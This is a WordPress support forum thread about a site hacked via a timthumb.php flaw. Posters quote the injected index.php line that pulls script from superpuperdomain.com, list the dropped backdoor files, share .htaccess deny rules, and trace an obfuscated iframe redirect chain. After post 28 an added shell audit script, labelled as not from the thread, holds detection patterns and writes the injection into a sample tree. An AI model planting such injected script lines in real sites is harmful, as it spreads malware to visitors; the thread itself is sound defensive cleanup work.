
WordPress HTTPS (SSL)
[resolved] Two Strange Errors (35 posts)

  1. cfisher
    Member
    Posted 2 years ago #

    Hello,

    I am using Version 1.9.1 of your plugin.

    Things have worked great for a long time but recently things have gone haywire.

    I have two problems that I cannot seem to figure out.

    1. I am now forced to log into my WordPress admin via https. If I log in via http, I am redirected to the login each and every time.

    2. For some reason, I started to get browser warnings that my https is not loading securely, along with a broken https in the browser's URL line. The culprit turned out to be http://superpuperdomain.com/count.php which apparently is WordPress core code (index.php). So I enabled, as suggested in this forum, External HTTPS Elements and Bypass External Check. That fixed the security errors. However, now in Internet Explorer 9, I get this warning: "Internet Explorer blocked this website from displaying content with security certificate errors." The interesting thing is this appears on non-https pages - even before I reach an https page. This is a new error, and I am confident my security certificate is fine.

    Any suggestions?

    Thanks!
    Chris

  2. bballad
    Member
    Posted 2 years ago #

    You have been hacked; your theme is the culprit.

    http://wordpress.org/support/topic/rss-feed-crash?replies=6

  3. cfisher
    Member
    Posted 2 years ago #

    Dang. I think you are right. I checked my index.php against a freshly downloaded WordPress 3.2.1 and indeed it is not part of the core WordPress Code.

    In fact, I found the exact code identified in the link you sent:

    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    echo'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>

    Now I need to figure out how to fix this.

    Thanks for your help.

    Chris

  4. OceansDB
    Member
    Posted 2 years ago #

    Going to quote my post for y'all

    Hello,

    I have/had a similar problem, not with my rss though.

    You should read the following about superpuperdomain.com

    What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

    Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

    I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

    I scoured the Internet and finally found a fix.

    First, in your WordPress’s index.php, remove the following script added by the hack:

    echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

    Then remove three phony files added by the hackers (back up first, in case your installation actually requires these files):

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-content/udp.php

    Do not try to open any of these files, as my antivirus sounded alarms immediately.

    I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

    To increase your site’s security, make sure you have correct permissions for files and directories.

    Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

    Run these commands to set the correct permissions recursively for your WordPress installation (directories 755, files 644):

    find /wordpressdirectory -type d -exec chmod 0755 {} +
    find /wordpressdirectory -type f -exec chmod 0644 {} +

    I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

    order allow,deny
    deny from 91.220
    allow from all

    The malicious script was run from superpuperdomain.com and I had run a traceroute on that domain, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220) and they would receive a forbidden notice if they tried to access TechSpheria again.

    Source: Techspheria

    http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/

    Maybe it is a smart idea to check your WordPress installation for the files, ban the IP and update your timthumb.php.... Just in case ;-)

    I guess we have to keep monitoring the website TechSperia, because yesterday they said there were two phony files, today there are three.

    Kind regards, OceansDB

  5. Mvied
    Member
    Plugin Author
    Posted 2 years ago #

    Sorry to hear you got hacked. Once the dust settles, let me know if you're having any issue with my plugin.

    Also, not that I've tried any of them, but do you have any security plugins installed? I don't really have any recommendations as I've never used them. I run my own server and tend to keep it on lockdown. I haven't had any issues yet, other than some clever spam bots on one of my Buddypress sites.

  6. OceansDB
    Member
    Posted 2 years ago #

    It is not your plugin. Timthumb.php has a security leak. The TS (topic starter) has to update his timthumb script.

  7. Mvied
    Member
    Plugin Author
    Posted 2 years ago #

    Yes, I know. I can read. Lol.

  8. cfisher
    Member
    Posted 2 years ago #

    Thanks everyone for the posts. I was indeed hacked because of the timthumb. It was used in my theme (Elegant Themes). The guys at BlogOnCloud9 are wonderful and responsive and already cleaned my website today. Everything is running fine again.

    However, Mvied, I cannot figure this one out. I am forced to log in via https on my website. If I log in via http, the login fails, and it redirects to this link: http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F

    Any suggestions?

    Chris

  9. Mvied
    Member
    Plugin Author
    Posted 2 years ago #

    Hey cfisher,

    I just released version 1.9.2 which has a fix for that issue. I actually ninja'd the fix into 1.9.1, but if you downloaded it before that, the bug would still occur. Update and let me know if that fixes it for you.

    Thanks,
    Mike

  10. cfisher
    Member
    Posted 2 years ago #

    Hi Mvied,

    That fixed it! Thanks for the prompt response and fix. Thanks to the community for their input too.

    All items have been resolved in this thread now.

    Thanks!
    Chris

  11. RoarinRow
    Member
    Posted 2 years ago #

    Thanks for the fix and the suggestions! I found all the files in question.

  12. OceansDB
    Member
    Posted 2 years ago #

    Okay, going to copy paste a few details here. The site you are giving Ipstenu is great, but doesn't inform about the phony files superpuperdomain places in your wordpress installation.

    Please do not forget to delete these files!

    /wp-admin/js/config.php
    /wp-admin/common.php
    /wp-admin/udp.php
    /wp-content/udp.php
    /wp-content/uploads/feed-file.php
    /wp-content/uploads/feed-files.php

    Don't forget to make a .htaccess file outside your public_html with these lines:

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    Thank you :-)

  13. lfaria
    Member
    Posted 2 years ago #

    Apart from these files, I also found:

    /wp-content/e334....php
    /wp-config.php
    /index.php

    which had injected code.

    Lauro Faria
    http://www.bdibbs.com.br

  14. wolfsteritory
    Member
    Posted 2 years ago #

    OK, so how do we make this update to TimThumb?

    I deleted those files last week, all was fine, but now it seems I can't see any pictures in my websites that are with external content.

    In FTP I see that timthumb.php was modified yesterday!

  15. lfaria
    Member
    Posted 2 years ago #

    Check the version of Timthumb.php.
    Here, it was version 2.4, but adulterated.
    The latest version is 2.7, but compare the official version.
    http://timthumb.googlecode.com/svn/trunk/timthumb.php
    Stay tuned.

  16. OceansDB
    Member
    Posted 2 years ago #

    I filed a complaint at superpuperdomain.com's registrar with some additional information and a virus report. I am very pleased to let y'all know the domain has been suspended :)

  17. jmillgraphics
    Member
    Posted 2 years ago #

    I'm getting crap from superpuperdomain2.com

  18. OceansDB
    Member
    Posted 2 years ago #

    Did you add the .htaccess I suggested?

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    I also suggest you ban the IP and IP range from those domains. You can use the WP-Ban plugin for this, or any other plugin that works the same.

  19. Elmo_is_evil
    Member
    Posted 2 years ago #

    Hello all, like many of you, one of my sites was affected by this crap...

    But I've found something else after cleaning it: a little iframe in an obfuscated JavaScript. In my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js:


    And it basically adds an iframe going to: http://counter-wordpress.com/frame.php. It's obviously engineered to be stealthy, as it's not showing in your HTML source and is loaded by a WordPress JS, and it probably doesn't do much at this moment (probably in standby).

    Anyone else have this ?

  20. OceansDB
    Member
    Posted 2 years ago #

    I have the files, but not the piece of code you are giving.....

  21. Elmo_is_evil
    Member
    Posted 2 years ago #

    Well, I've seen 2 other sites that got this, after being affected by the PHPRemoteView via timthumb.

  22. secretja
    Member
    Posted 2 years ago #

    Dang. Now I see that I have it too...

  23. lfaria
    Member
    Posted 2 years ago #

    Elmo_is_evil

    It did not occur in my case.

  24. lfaria
    Member
    Posted 2 years ago #

    No guarantees, but you can check the dates of the files in your WordPress installation. Those infected are dated the day of infection.

    I made a post in Portuguese, reporting on my case.

    http://www.bdibbs.com.br/2011/falha-de-seguranca-no-timthumb

  25. Mvied
    Member
    Plugin Author
    Posted 2 years ago #

    I checked out http://counter-wordpress.com/frame.php and it appears to load some scripts and then redirect to http://global-traff.com/tds/in.cgi?5&user=mexx and then to http://global-traff.com/tds/in.cgi?mexx and then to http://global-traff.com/tds/in.cgi?18 and then to http://global-traff.com/empity.html.

    The frame.php appears to be the same script from superpuperdomain.com and superpuperdomain2.com.

    After viewing the file once, it will always be blank (it probably stores your IP address and doesn't load anything again afterward). I haven't been able to pull the page back up to prevent the redirect and see exactly what it's loading.

  26. Elmo_is_evil
    Member
    Posted 2 years ago #

    Cool info Mvied, I will check with one of my dynamic IP VPNs.

  27. Cliff Seal
    Member
    Posted 2 years ago #

    Thanks, Elmo_is_evil. Your earlier comment helped me track down the same thing on every WP installation on my server. :)

    If you find this in any other files, please note it and I'll do the same.

  28. Cliff Seal
    Member
    Posted 2 years ago #

    Update:

    The same code was appended to any script in any directory that started with 'jquery'. So, even old versions of jQuery in old plugins, like 'jquery-1.3.2.min.js' were affected.
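An added audit script, not from this thread or any poster, that checks a WordPress tree for the artefacts described in posts 4, 12 and 28 (the dropped files, the count.php script tag injected into index.php, and the obfuscated loader appended to jquery*.js) and, following post 24, lists files newer than a known-clean reference file. The sample tree it builds is constructed, and the grep patterns are my own assumptions about the injected code's shape:

```shell
#!/bin/sh
# Added audit script (not from this thread): looks for the artefacts posters
# describe above and exercises the checks on a constructed sample tree.

# Files the thread reports the hack drops, relative to the WordPress root.
DROPPED="wp-admin/js/config.php wp-admin/common.php wp-admin/udp.php
wp-content/udp.php wp-content/uploads/feed-file.php wp-content/uploads/feed-files.php"

# Print each dropped file that exists under the root given as $1.
dropped_files() {
  for f in $DROPPED; do
    [ -e "$1/$f" ] && echo "$f"
  done
  return 0
}

# Print PHP files referencing the injected counter script (count.php on superpuperdomain*.com).
injected_php() {
  find "$1" -type f -name '*.php' -exec grep -l -e 'superpuperdomain[0-9]*\.com/count\.php' {} \;
}

# Print jquery*.js files carrying the appended loader: a hex-escaped string table
# assigned to an _0x... variable (assumed shape: var _0x4de4=["\x64...).
injected_js() {
  find "$1" -type f -name 'jquery*.js' -exec grep -l -e 'var _0x[0-9a-f]*=\["\\x' {} \;
}

# Print files modified after a known-clean reference file $2 (post 24's date check).
changed_since() {
  find "$1" -type f -newer "$2"
}

# --- constructed sample tree, not a real site ---
WP=$(mktemp -d)
mkdir -p "$WP/wp-admin/js" "$WP/wp-content/uploads" "$WP/wp-includes/js/jquery"
touch -t 201108010000 "$WP/known-clean.txt"   # reference dated before the "infection"
cat > "$WP/index.php" <<'EOF'
<?php
require('./wp-blog-header.php');
echo '<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']).'"></script>';
EOF
echo '<?php echo "dropped";' > "$WP/wp-admin/common.php"
echo '/* clean */' > "$WP/wp-includes/js/l10n.js"
printf 'var _0x4de4=["\\x64\\x20"];eval(function(){}());\n' > "$WP/wp-includes/js/jquery/jquery.js"

# Report: one line per finding.
dropped_files "$WP"; injected_php "$WP"; injected_js "$WP"; changed_since "$WP" "$WP/known-clean.txt"
```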

  29. OceansDB
    Member
    Posted 2 years ago #

    Okay... Now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru....

    It seems to be a lot more difficult to resolve :-(

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?

Topic Closed

This topic has been closed to new replies.
